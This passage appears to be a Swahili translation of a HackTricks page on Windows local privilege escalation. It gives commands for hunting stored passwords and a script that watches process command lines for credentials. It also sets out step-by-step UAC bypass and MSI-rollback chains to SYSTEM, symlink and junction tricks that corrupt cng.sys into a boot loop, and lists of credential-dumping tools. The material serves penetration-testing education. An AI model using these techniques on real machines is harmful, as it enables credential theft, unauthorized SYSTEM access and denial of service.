COM classes and interfaces zimefafanuliwa kwenye registry chini ya HKEY\CLASSES\ROOT\CLSID na HKEY\CLASSES\ROOT\Interface respectively. Registry hii inaundwa kwa kuunganisha HKEY\LOCAL\MACHINE\Software\Classes + HKEY\CURRENT\USER\Software\Classes = HKEY\CLASSES\ROOT.

Ndani ya CLSIDs za registry hii unaweza kupata child registry InProcServer32 ambayo ina default value inayoelekeza kwenye DLL na value inayoitwa ThreadingModel ambayo inaweza kuwa Apartment (Single-Threaded), Free (Multi-Threaded), Both (Single or Multi) au Neutral (Thread Neutral).

Kimsingi, ukiweza overwrite any of the DLLs ambazo zitaendeshwa, unaweza escalate privileges ikiwa hiyo DLL itaendeshwa na user tofauti.

Ili kujifunza jinsi attackers hutumia COM Hijacking kama persistence mechanism angalia:

COM Hijacking

Generic Password search in files and registry

Search for file contents

cd C:\ & findstr /SI /M "password" *.xml *.ini *.txt
findstr /si password *.xml *.ini *.txt *.config
findstr /spin "password" *.*

Tafuta faili lenye jina fulani

dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config*
where /R C:\ user.txt
where /R C:\ *.ini

Tafuta kwenye registry majina ya key na passwords

REG QUERY HKLM /F "password" /t REG_SZ /S /K
REG QUERY HKCU /F "password" /t REG_SZ /S /K
REG QUERY HKLM /F "password" /t REG_SZ /S /d
REG QUERY HKCU /F "password" /t REG_SZ /S /d

Zana zinazotafuta passwords

MSF-Credentials Plugin is a msf plugin nimeunda plugin hii ili kiotomatiki iteue kila metasploit POST module inayotafuta credentials ndani ya victim.
Winpeas hutafuta kiotomatiki faili zote zilizo na passwords zilizotajwa katika ukurasa huu.
Lazagne ni tool nyingine nzuri ya kutoa password kutoka kwenye system.

Tool SessionGopher hutafuta sessions, usernames na passwords za tools kadhaa zinazohifadhi data hii kwa wazi (PuTTY, WinSCP, FileZilla, SuperPuTTY, na RDP)

Import-Module path\to\SessionGopher.ps1;
Invoke-SessionGopher -Thorough
Invoke-SessionGopher -AllDomain -o
Invoke-SessionGopher -AllDomain -u domain.com\adm-arvanaghi -p s3cr3tP@ss

Leaked Handlers

Fikiria kwamba process inayoendeshwa kama SYSTEM inafungua process mpya (OpenProcess()) ikiwa na full access. Process hiyo hiyo pia inaunda process mpya (CreateProcess()) ikiwa na low privileges lakini ikirithi open handles zote za main process.
Kisha, ikiwa una full access kwa process ya low privilege, unaweza kuchukua open handle kwenda kwenye privileged process iliyoundwa na OpenProcess() na kuingiza shellcode.
Read this example for more information about how to detect and exploit this vulnerability.
Read this other post for a more complete explanation on how to test and abuse more open handlers of processes and threads inherited with different levels of permissions (not only full access).

Named Pipe Client Impersonation

Shared memory segments, zinazojulikana kama pipes, huwezesha mawasiliano ya process na uhamishaji wa data.

Windows hutoa feature inayoitwa Named Pipes, inayoruhusu process zisizohusiana kushiriki data, hata kwenye networks tofauti. Hii inafanana na client/server architecture, ambapo roles hufafanuliwa kama named pipe server na named pipe client.

Wakati data inatumwa kupitia pipe na client, server iliyoanzisha pipe ina uwezo wa kuchukua identity ya client, ikiwa ina SeImpersonate rights zinazohitajika. Kutambua privileged process inayowasiliana kupitia pipe unayoweza kuiga kunatoa nafasi ya kupata higher privileges kwa kuchukua identity ya process hiyo mara tu inaposhirikiana na pipe uliyounda. Kwa maelekezo ya kutekeleza shambulio kama hilo, guides muhimu zinaweza kupatikana here na here.

Pia tool ifuatayo inaruhusu kuzuia named pipe communication kwa tool kama burp: https://github.com/gabriel-sztejnworcel/pipe-intercept na tool hii inaruhusu kuorodhesha na kuona pipes zote ili kupata privescs https://github.com/cyberark/PipeViewer

Telephony tapsrv remote DWORD write to RCE

Telephony service (TapiSrv) katika server mode hufichua \\pipe\\tapsrv (MS-TRP). Remote authenticated client anaweza kutumia mailslot-based async event path kubadilisha ClientAttach kuwa 4-byte write ya kiholela kwa faili lolote lililopo linaloweza kuandikwa na NETWORK SERVICE, kisha kupata Telephony admin rights na kupakia DLL ya kiholela kama service. Full flow:

• ClientAttach ikiwa na pszDomainUser imewekwa kwa writable existing path → service huifungua kupitia CreateFileW(..., OPEN_EXISTING) na kuitumia kwa async event writes.
• Kila event huandika InitContext inayodhibitiwa na attacker kutoka Initialize kwenda kwenye handle hiyo. Sajili line app kwa LRegisterRequestRecipient (Req_Func 61), chochea TRequestMakeCall (Req_Func 121), pokea kupitia GetAsyncEvents (Req_Func 0), kisha unregister/shutdown ili kurudia deterministic writes.
• Ongeza jina lako kwenye [TapiAdministrators] katika C:\Windows\TAPI\tsec.ini, reconnect, kisha piga GetUIDllName na arbitrary DLL path ili kutekeleza TSPI_providerUIIdentify kama NETWORK SERVICE.

More details:

Telephony Tapsrv Arbitrary Dword Write To Rce

Misc

File Extensions that could execute stuff in Windows

Angalia ukurasa https://filesec.io/

Protocol handler / ShellExecute abuse via Markdown renderers

Clickable Markdown links zilizopitishwa kwa ShellExecuteExW zinaweza kuchochea dangerous URI handlers (file:, ms-appinstaller: au any registered scheme) na kutekeleza attacker-controlled files kama current user. See:

Protocol Handler Shell Execute Abuse

Monitoring Command Lines for passwords

Unapopata shell kama user, huenda kukawa na scheduled tasks au process nyingine zinazoendeshwa ambazo zinapitisha credentials kwenye command line. Script hapa chini hukamata process command lines kila baada ya sekunde mbili na kulinganisha current state na previous state, kisha kutoa differences zozote.

while($true)
{
$process = Get-WmiObject Win32_Process | Select-Object CommandLine
Start-Sleep 1
$process2 = Get-WmiObject Win32_Process | Select-Object CommandLine
Compare-Object -ReferenceObject $process -DifferenceObject $process2
}

Kuiba nenosiri kutoka kwenye processes

Kutoka Low Priv User hadi NT\AUTHORITY SYSTEM (CVE-2019-1388) / UAC Bypass

Ukiwa na access ya graphical interface (kupitia console au RDP) na UAC ikiwa enabled, katika baadhi ya versions za Microsoft Windows inawezekana ku-run terminal au process nyingine yoyote kama “NT\AUTHORITY SYSTEM” kutoka kwa user asiye na privileges.

Hii huwezesha privilege escalation na bypass ya UAC kwa wakati huohuo kwa kutumia vulnerability ileile. Zaidi ya hayo, hakuna haja ya kusakinisha chochote, na binary inayotumika wakati wa mchakato huu imesainiwa na kutolewa na Microsoft.

Baadhi ya systems zilizoathirika ni hizi zifuatazo:

SERVER
======

Windows 2008r2	7601	** link OPENED AS SYSTEM **
Windows 2012r2	9600	** link OPENED AS SYSTEM **
Windows 2016	14393	** link OPENED AS SYSTEM **
Windows 2019	17763	link NOT opened


WORKSTATION
===========

Windows 7 SP1	7601	** link OPENED AS SYSTEM **
Windows 8		9200	** link OPENED AS SYSTEM **
Windows 8.1		9600	** link OPENED AS SYSTEM **
Windows 10 1511	10240	** link OPENED AS SYSTEM **
Windows 10 1607	14393	** link OPENED AS SYSTEM **
Windows 10 1703	15063	link NOT opened
Windows 10 1709	16299	link NOT opened

Ili kutumia udhaifu huu, ni lazima kutekeleza hatua zifuatazo:

1) Right click on the HHUPD.EXE file and run it as Administrator.

2) When the UAC prompt appears, select "Show more details".

3) Click "Show publisher certificate information".

4) If the system is vulnerable, when clicking on the "Issued by" URL link, the default web browser may appear.

5) Wait for the site to load completely and select "Save as" to bring up an explorer.exe window.

6) In the address path of the explorer window, enter cmd.exe, powershell.exe or any other interactive process.

7) You now will have an "NT\AUTHORITY SYSTEM" command prompt.

8) Remember to cancel setup and the UAC prompt to return to your desktop.

You have all the necessary files and information in the following GitHub repository:

https://github.com/jas502n/CVE-2019-1388

Kutoka Administrator Medium hadi High Integrity Level / UAC Bypass

Soma hili ili kujifunza kuhusu Integrity Levels:

Integrity Levels

Kisha soma hili ili kujifunza kuhusu UAC na UAC bypasses:

UAC - User Account Control

Kutoka Arbitrary Folder Delete/Move/Rename hadi SYSTEM EoP

Technique iliyoelezewa katika blog post hii pamoja na exploit code inayopatikana hapa.

Shambulio kwa msingi linajumuisha kutumia vibaya Windows Installer rollback feature ili kubadilisha files halali na malicious ones wakati wa mchakato wa uninstall. Kwa hili, attacker anahitaji kuunda malicious MSI installer ambayo itatumika kuhijack folda ya C:\Config.Msi, ambayo baadaye itatumika na Windows Installer kuhifadhi rollback files wakati wa uninstall ya packages nyingine za MSI ambapo rollback files zingekuwa zimebadilishwa ili kuwa na malicious payload.

Technique iliyofupishwa ni ifuatayo:

1. Stage 1 – Kujiandaa kwa Hijack (acha C:\Config.Msi iwe empty)

• Step 1: Install the MSI

• Tengeneza .msi ambayo husakinisha file isiyo na madhara (kwa mfano, dummy.txt) katika folda inayoweza kuandikiwa (TARGETDIR).

• Weka installer kuwa “UAC Compliant”, ili non-admin user aweze kui-run.

• Acha handle ikiwa open kwenye file baada ya install.

• Step 2: Anza Uninstall

• Uninstall .msi hiyo hiyo.

• Mchakato wa uninstall huanza kuhamisha files kwenda C:\Config.Msi na kuzipa majina mapya kuwa .rbf files (rollback backups).

• Poll the open file handle kwa kutumia GetFinalPathNameByHandle ili kugundua wakati file inakuwa C:\Config.Msi\<random>.rbf.

• Step 3: Custom Syncing

• .msi inajumuisha custom uninstall action (SyncOnRbfWritten) ambayo:

• Huashiria wakati .rbf imeandikwa.

• Kisha husubiri event nyingine kabla ya kuendelea na uninstall.

• Step 4: Zuia Kufutwa kwa .rbf

• Wakati ikishajiwa, fungua file ya .rbf bila FILE_SHARE_DELETE — hii huzuia kufutwa kwake.

• Kisha tuma signal kurudi ili uninstall iweze kumaliza.

• Windows Installer inashindwa kufuta .rbf, na kwa kuwa haiwezi kufuta contents zote, C:\Config.Msi haiondolewi.

• Step 5: Futa .rbf kwa Mikono

• Wewe (attacker) futa file ya .rbf kwa mikono.

• Sasa C:\Config.Msi iko empty, tayari kuhijackwa.

Kwa wakati huu, trigger the SYSTEM-level arbitrary folder delete vulnerability ili kufuta C:\Config.Msi.

2. Stage 2 – Kubadilisha Rollback Scripts na Malicious Ones

• Step 6: Tengeneza upya C:\Config.Msi na Weak ACLs

• Tengeneza upya folda ya C:\Config.Msi wewe mwenyewe.

• Weka weak DACLs (kwa mfano, Everyone:F), na weka handle open na WRITE_DAC.

• Step 7: Endesha Install Nyingine

• Install .msi tena, na:

• TARGETDIR: Eneo linaloweza kuandikwa.

• ERROROUT: Variable inayosababisha forced failure.

• Install hii itatumika ku-trigger rollback tena, ambayo husoma .rbs na .rbf.

• Step 8: Monitor kwa .rbs

• Tumia ReadDirectoryChangesW kufuatilia C:\Config.Msi hadi .rbs mpya ionekane.

• Capture filename yake.

• Step 9: Sync Kabla ya Rollback

• .msi ina custom install action (SyncBeforeRollback) ambayo:

• Huashiria event wakati .rbs imeundwa.

• Kisha husubiri kabla ya kuendelea.

• Step 10: Weka Tena Weak ACL

• Baada ya kupokea event ya .rbs created:

• Windows Installer huweka tena strong ACLs kwa C:\Config.Msi.

• Lakini kwa kuwa bado una handle yenye WRITE_DAC, unaweza kuweka tena weak ACLs.

ACLs hutekelezwa tu wakati handle inapofunguliwa, kwa hiyo bado unaweza kuandika kwenye folda.

• Step 11: Dondosha Fake .rbs na .rbf

• Overwrite file ya .rbs kwa fake rollback script ambayo huiambia Windows:

• Rudisha file yako ya .rbf (malicious DLL) kwenda kwenye privileged location (kwa mfano, C:\Program Files\Common Files\microsoft shared\ink\HID.DLL).

• Dondosha fake .rbf yako yenye malicious SYSTEM-level payload DLL.

• Step 12: Trigger the Rollback

• Tuma signal ya sync event ili installer iendelee.

• A type 19 custom action (ErrorOut) imeandaliwa ili kushindwa kwa makusudi install kwenye point inayojulikana.

• Hii husababisha rollback kuanza.

• Step 13: SYSTEM Husakinisha DLL Yako

• Windows Installer:

• Husoma .rbs yako mbaya.

• Hunakili DLL yako ya .rbf kwenda kwenye target location.

• Sasa una malicious DLL yako katika SYSTEM-loaded path.

• Hatua ya Mwisho: Execute SYSTEM Code

• Endesha trusted auto-elevated binary (kwa mfano, osk.exe) ambayo hupakia DLL uliyohijack.

• Boom: Code yako inatekelezwa kama SYSTEM.

Kutoka Arbitrary File Delete/Move/Rename hadi SYSTEM EoP

Technique kuu ya MSI rollback (ile ya awali) inadhania kuwa unaweza kufuta folder nzima (kwa mfano, C:\Config.Msi). Lakini je, ikiwa vulnerability yako inaruhusu tu arbitrary file deletion ?

Unaweza kutumia NTFS internals: kila folder ina hidden alternate data stream inayoitwa:

C:\SomeFolder::$INDEX_ALLOCATION

Mtiririko huu huhifadhi index metadata ya folda.

Kwa hiyo, ukifuta mtiririko ::$INDEX_ALLOCATION wa folda, NTFS huondoa folda nzima kutoka kwenye filesystem.

Unaweza kufanya hivi kwa kutumia standard file deletion APIs kama:

DeleteFileW(L"C:\\Config.Msi::$INDEX_ALLOCATION");

Hata kama unaita API ya kufuta file, inafuta folda yenyewe.

Kutoka Kufuta Maudhui ya Folda hadi SYSTEM EoP

Je, primitive yako hairuhusu kufuta files/folders za kiholela, lakini inaruhusu kufuta maudhui ya folda ambayo mshambuliaji anaudhibiti?

1. Hatua ya 1: Sanidi folda na file ya mtego

• Unda: C:\temp\folder1
• Ndani yake: C:\temp\folder1\file1.txt

2. Hatua ya 2: Weka oplock kwenye file1.txt

• Oplock inasitisha utekelezaji wakati process yenye ruhusa ya juu inajaribu kufuta file1.txt.

// pseudo-code
RequestOplock("C:\\temp\\folder1\\file1.txt");
WaitForDeleteToTriggerOplock();

3. Hatua ya 3: Chochea mchakato wa SYSTEM (kwa mfano, SilentCleanup)

• Mchakato huu huchanganua folda (kwa mfano, %TEMP%) na hujaribu kufuta yaliyomo.
• Unapofikia file1.txt, oplock huanzishwa na hukabidhi udhibiti kwa callback yako.

4. Hatua ya 4: Ndani ya callback ya oplock – kuelekeza uondoaji

• Chaguo A: Hamisha file1.txt kwenda mahali pengine

• Hii huondoa yaliyomo ya folder1 bila kuvunja oplock.

• Usifute file1.txt moja kwa moja — hilo lingetoa oplock mapema sana.

• Chaguo B: Badilisha folder1 kuwa junction:

# folder1 is now a junction to \RPC Control (non-filesystem namespace)
mklink /J C:\temp\folder1 \\?\GLOBALROOT\RPC Control

• Option C: Tengeneza symlink katika \RPC Control:

# Make file1.txt point to a sensitive folder stream
CreateSymlink("\\RPC Control\\file1.txt", "C:\\Config.Msi::$INDEX_ALLOCATION")

Hii inalenga stream ya ndani ya NTFS inayohifadhi metadata ya folda — kuifuta kunafuta folda.

5. Hatua ya 5: Achia oplock

• Mchakato wa SYSTEM unaendelea na unajaribu kufuta file1.txt.
• Lakini sasa, kutokana na junction + symlink, kwa kweli inafuta:

C:\Config.Msi::$INDEX_ALLOCATION

Result: C:\Config.Msi imefutwa na SYSTEM.

Kutoka Arbitrary Folder Create hadi Permanent DoS

Tumia primitive inayokuruhusu kuunda folda yoyote kama SYSTEM/admin — hata kama huwezi kuandika faili au kuweka ruhusa dhaifu.

Unda folda (si faili) yenye jina la Windows driver muhimu, kwa mfano:

C:\Windows\System32\cng.sys

• Lengo hili kawaida linahusiana na cng.sys kernel-mode driver.
• Ukiliunda mapema kama folda, Windows hushindwa kupakia driver halisi wakati wa boot.
• Kisha, Windows hujaribu kupakia cng.sys wakati wa boot.
• Huona folda hiyo, hushindwa kupata driver halisi, na hucrash au husitisha boot.
• Hakuna fallback, na hakuna recovery bila uingiliaji wa nje (mfano, boot repair au upatikanaji wa disk).

Kutoka privileged log/backup paths + OM symlinks hadi arbitrary file overwrite / boot DoS

Wakati privileged service inapoandika logs/exports kwenye path inayosomwa kutoka writable config, elekeza path hiyo kwa Object Manager symlinks + NTFS mount points ili kubadilisha privileged write kuwa arbitrary overwrite (hata bila SeCreateSymbolicLinkPrivilege).

Mahitaji

• Config inayohifadhi target path inaweza kuandikwa na attacker (mfano, %ProgramData%\...\.ini).
• Uwezo wa kuunda mount point kwenda \RPC Control na OM file symlink (James Forshaw symboliclink-testing-tools).
• Operesheni yenye privileged inayoweka data kwenye path hiyo (log, export, report).

Mfano wa chain

1. Soma config ili kupata privileged log destination, mfano SMSLogFile=C:\users\iconics_user\AppData\Local\Temp\logs\log.txt katika C:\ProgramData\ICONICS\IcoSetup64.ini.
2. Elekeza path bila admin:

mkdir C:\users\iconics_user\AppData\Local\Temp\logs
CreateMountPoint C:\users\iconics_user\AppData\Local\Temp\logs \RPC Control
CreateSymlink "\\RPC Control\\log.txt" "\\??\\C:\\Windows\\System32\\cng.sys"

3. Subiri mpaka component yenye privilege iandike log (mfano, admin achochee “send test SMS”). Uandishi sasa unaishia kwenye C:\Windows\System32\cng.sys.
4. Kagua target iliyofutwa/kubadilishwa (hex/PE parser) ili kuthibitisha corruption; reboot hulazimisha Windows kupakia path ya driver iliyoharibiwa → boot loop DoS. Hii pia inatumika kwa faili yoyote iliyolindwa ambayo service yenye privilege itafungua kwa ajili ya write.

cng.sys kwa kawaida hupakiwa kutoka C:\Windows\System32\drivers\cng.sys, lakini ikiwa kuna copy katika C:\Windows\System32\cng.sys inaweza kujaribiwa kwanza, hivyo kuifanya iwe sink ya kuaminika ya DoS kwa data iliyoharibika.

Kutoka High Integrity hadi System

Service mpya

Ikiwa tayari unaendesha kwenye High Integrity process, path to SYSTEM inaweza kuwa rahisi kwa kuunda na kuendesha service mpya:

sc create newservicename binPath= "C:\windows\system32\notepad.exe"
sc start newservicename

Tip

Unapotengeneza service binary hakikisha ni valid service au kwamba binary inatekeleza hatua zinazohitajika haraka, kwani itauawa baada ya 20s ikiwa si valid service.

AlwaysInstallElevated

Kutoka kwenye High Integrity process unaweza kujaribu kuwezesha AlwaysInstallElevated registry entries na kusakinisha reverse shell ukitumia .msi wrapper.
Maelezo zaidi kuhusu registry keys zinazohusika na jinsi ya kusakinisha package ya .msi hapa.

High + SeImpersonate privilege to System

Unaweza kupata code hapa.

From SeDebug + SeImpersonate to Full Token privileges

Ukiona token privileges hizo (huenda utapata hili kwenye High Integrity process iliyopo tayari), utaweza kufungua karibu process yoyote (zisizo protected processes) kwa kutumia SeDebug privilege, kunakili token ya process, na kuunda arbitrary process yenye token hiyo.
Kwa kawaida technique hii huchagua process yoyote inayoendeshwa kama SYSTEM yenye token privileges zote (ndiyo, unaweza kupata SYSTEM processes zisizo na token privileges zote).
Unaweza kupata mfano wa code unaotekeleza technique iliyopendekezwa hapa.

Named Pipes

Technique hii hutumiwa na meterpreter kupandisha privilege kwenye getsystem. Technique hii inajumuisha kuunda pipe kisha kuunda/kutumia vibaya service ili iandike kwenye pipe hiyo. Kisha, server iliyounda pipe kwa kutumia SeImpersonate privilege itaweza kuiga token ya pipe client (service) na kupata SYSTEM privileges.
Ukihitaji kujifunza zaidi kuhusu name pipes unapaswa kusoma hili.
Ukihitaji kusoma mfano wa jinsi ya kutoka high integrity kwenda System kwa kutumia name pipes unapaswa kusoma hili.

Dll Hijacking

Ukiweza kuhijack dll inayokuwa loaded na process inayoendeshwa kama SYSTEM utaweza kutekeleza arbitrary code kwa permissions hizo. Kwa hiyo Dll Hijacking pia ni muhimu kwa aina hii ya privilege escalation, na zaidi ya hapo, huwa rahisi zaidi kuifanya kutoka kwenye high integrity process kwa sababu itakuwa na write permissions kwenye folda zinazotumiwa kupakia dlls.
Unaweza kujifunza zaidi kuhusu Dll hijacking hapa.

From Administrator or Network Service to System

• https://github.com/sailay1996/RpcSsImpersonator
• https://decoder.cloud/2020/05/04/from-network-service-to-system/
• https://github.com/decoder-it/NetworkServiceExploit

From LOCAL SERVICE or NETWORK SERVICE to full privs

Soma: https://github.com/itm4n/FullPowers

More help

Static impacket binaries

Useful tools

Best tool to look for Windows local privilege escalation vectors: WinPEAS

PS

PrivescCheck
PowerSploit-Privesc(PowerUP) – Angalia misconfigurations na sensitive files (angalia hapa). Detected.
JAWS – Angalia baadhi ya possible misconfigurations na kukusanya info (angalia hapa).
privesc – Angalia misconfigurations
SessionGopher – Hutoa taarifa za session zilizohifadhiwa za PuTTY, WinSCP, SuperPuTTY, FileZilla, na RDP. Tumia -Thorough kwenye local.
Invoke-WCMDump – Hutoa crendentials kutoka Credential Manager. Detected.
DomainPasswordSpray – Sambaza passwords zilizokusanywa kwenye domain nzima
Inveigh – Inveigh ni PowerShell ADIDNS/LLMNR/mDNS spoofer na man-in-the-middle tool.
WindowsEnum – Basic privesc Windows enumeration
Sherlock ~~~~ – Tafuta known privesc vulnerabilities (DEPRECATED for Watson)
WINspect – Local checks (Need Admin rights)

Exe

Watson – Tafuta known privesc vulnerabilities (inahitaji ku-compile kwa kutumia VisualStudio) (precompiled)
SeatBelt – Huchunguza host ikitafuta misconfigurations (zaidi ni gather info tool kuliko privesc) (inahitaji ku-compile) (precompiled)
LaZagne – Hutoa credentials kutoka kwenye software nyingi (precompiled exe in github)
SharpUP – Port of PowerUp to C#
Beroot ~~~~ – Angalia misconfiguration (executable precompiled in github). Not recommended. Hufanyi kazi vizuri kwenye Win10.
Windows-Privesc-Check – Angalia possible misconfigurations (exe kutoka python). Not recommended. Hufanyi kazi vizuri kwenye Win10.

Bat

winPEASbat – Tool iliyoundwa kulingana na post hii (haihitaji accesschk ili ifanye kazi vizuri lakini inaweza kuitumia).

Local

Windows-Exploit-Suggester – Husoma output ya systeminfo na kupendekeza working exploits (local python)
Windows Exploit Suggester Next Generation – Husoma output ya systeminfo na kupendekeza working exploits (local python)

Meterpreter

multi/recon/local_exploit_suggestor

Lazima ucompile project ukitumia toleo sahihi la .NET (angalia hapa). Ili kuona toleo la .NET lililosakinishwa kwenye victim host unaweza kufanya:

C:\Windows\microsoft.net\framework\v4.0.30319\MSBuild.exe -version #Compile the code with the version given in "Build Engine version" line

Marejeo

• http://www.fuzzysecurity.com/tutorials/16.html

• http://www.greyhathacker.net/?p=738

• http://it-ovid.blogspot.com/2012/02/windows-privilege-escalation.html

• https://github.com/sagishahar/lpeworkshop

• https://www.youtube.com/watch?v=_8xJaaQlpBo

• https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_windows.html

• https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md

• https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/

• https://github.com/netbiosX/Checklists/blob/master/Windows-Privilege-Escalation.md

• https://github.com/frizb/Windows-Privilege-Escalation

• https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/

• https://github.com/frizb/Windows-Privilege-Escalation

• http://it-ovid.blogspot.com/2012/02/windows-privilege-escalation.html

• https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md#antivirus–detections

• 0xdf – HTB/VulnLab JobTwo: Word VBA macro phishing via SMTP → hMailServer credential decryption → Veeam CVE-2023-27532 to SYSTEM

• HTB Reaper: Format-string leak + stack BOF → VirtualAlloc ROP (RCE) and kernel token theft

• Check Point Research – Chasing the Silver Fox: Cat & Mouse in Kernel Shadows

• Unit 42 – Vulnerability ya Mfumo wa Faili wenye Haki Maalum Iliyopo katika Mfumo wa SCADA

• Symbolic Link Testing Tools – CreateSymlink usage

• A Link to the Past. Kutumia vibaya Symbolic Links kwenye Windows

• RIP RegPwn – MDSec

• RegPwn BOF (Cobalt Strike BOF port)

• ZDI - Node.js Trust Falls: Dangerous Module Resolution on Windows

• Node.js modules: loading from node_modules folders

• npm package.json: optionalDependencies

• Process Monitor (Procmon)

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE) Vinjari katalogi kamili ya HackTricks Training kwa ajili ya njia za assessment (ARTA/GRTA/AzRTA) na Linux Hacking Expert (LHE).

Support HackTricks

• Angalia subscription plans!
• Jiunge na 💬 Discord group, telegram group, fuata @hacktricks_live kwenye X/Twitter, au angalia LinkedIn page na YouTube channel.
• Shiriki hacking tricks kwa kutuma PRs kwenye HackTricks na HackTricks Cloud github repos.